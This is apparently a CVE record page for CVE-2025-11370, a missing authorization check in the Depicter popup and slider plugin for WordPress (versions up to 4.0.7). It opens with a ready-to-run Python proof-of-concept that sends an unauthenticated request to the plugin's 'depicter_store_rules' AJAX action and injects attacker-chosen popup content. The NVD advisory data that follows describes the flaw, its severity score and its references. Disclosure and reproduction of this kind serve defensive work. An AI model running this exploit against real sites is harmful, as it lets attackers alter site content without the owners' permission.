CVE-2025-11370

# CVE-2025-11370 PoC - Unauthenticated Data Modification # Target: WordPress site with Depicter plugin <= 4.0.7 import requests import json target_url = "http://target-wordpress-site.com" # Step 1: Identify the vulnerable endpoint ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Step 2: Construct malicious request to modify popup settings # The 'store' function in RulesAjaxController lacks capability check payload = { "action": "depicter_store_rules", "rules": json.dumps({ "popup_id": 1, "settings": { "enabled": True, "trigger_type": "immediate", "content": "Malicious content injected by attacker", "display_frequency": "always" } }) } # Step 3: Send unauthenticated request response = requests.post(ajax_endpoint, data=payload) # Step 4: Check if modification was successful if response.status_code == 200: result = response.json() if result.get("success"): print("[+] Popup settings modified successfully!") print(f"[+] Response: {result}") else: print("[-] Request failed") else: print(f"[-] HTTP Error: {response.status_code}") print("\nNote: This PoC demonstrates the vulnerability exists.") print("The attacker can modify popup display settings without authentication.")

{"cve": {"id": "CVE-2025-11370", "sourceIdentifier": "[email protected]", "published": "2026-01-06T04:15:51.430", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Popup and Slider Builder by Depicter – Add Email collecting Popup, Popup Modal, Coupon Popup, Image Slider, Carousel Slider, Post Slider Carousel plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'store' function of the RulesAjaxController class in all versions up to, and including, 4.0.7. This makes it possible for unauthenticated attackers to update pop-up display settings."}, {"lang": "es", "value": "El plugin Popup and Slider Builder by Depicter – Add Email collecting Popup, Popup Modal, Coupon Popup, Image Slider, Carousel Slider, Post Slider Carousel para WordPress es vulnerable a la modificación no autorizada de datos debido a una falta de verificación de capacidad en la función 'store' de la clase RulesAjaxController en todas las versiones hasta la 4.0.7, inclusive. Esto hace posible que atacantes no autenticados actualicen la configuración de visualización de los pop-ups."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/nguy3nB4oo11/depicter-vuln-repro/blob/main/RulesAjaxController.php", "source": "[email protected]"}, {"url": "https://github.com/nguy3nB4oo11/depicter-vuln-repro/blob/main/ajax.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3428118/depicter/trunk/app/routes/ajax.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d35faf39-4882-4393-9b77-57dc45ac9d04?source=cve", "source": "[email protected]"}]}}